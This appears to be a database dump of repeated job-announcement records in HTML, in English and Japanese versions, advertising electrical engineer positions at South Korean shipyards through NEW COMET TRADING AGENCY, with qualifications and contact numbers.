('announcement', 0, 10, 316, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 316, 'ja', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><p>韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。<br>電気エンジニア<br>1)資格&nbsp;<br>大学の学士号またはそれ以上の学位 + その分野での1年の経験<br>&nbsp; &nbsp;コミュニティカレッジの学位 + その分野での5年の経験</p><p>2)関連する学位と経験<br>学位: 電子工学、電力工学</p><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 316, 'ko', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 321, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 321, 'ja', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><p>韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。<br>電気エンジニア<br>1)資格&nbsp;<br>大学の学士号またはそれ以上の学位 + その分野での1年の経験<br>&nbsp; &nbsp;コミュニティカレッジの学位 + その分野での5年の経験</p><p>2)関連する学位と経験<br>学位: 電子工学、電力工学</p><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 321, 'ko', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 339, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 339, 'ja', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><p>韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。<br>電気エンジニア<br>1)資格&nbsp;<br>大学の学士号またはそれ以上の学位 + その分野での1年の経験<br>&nbsp; &nbsp;コミュニティカレッジの学位 + その分野での5年の経験</p><p>2)関連する学位と経験<br>学位: 電子工学、電力工学</p><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 339, 'ko', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" 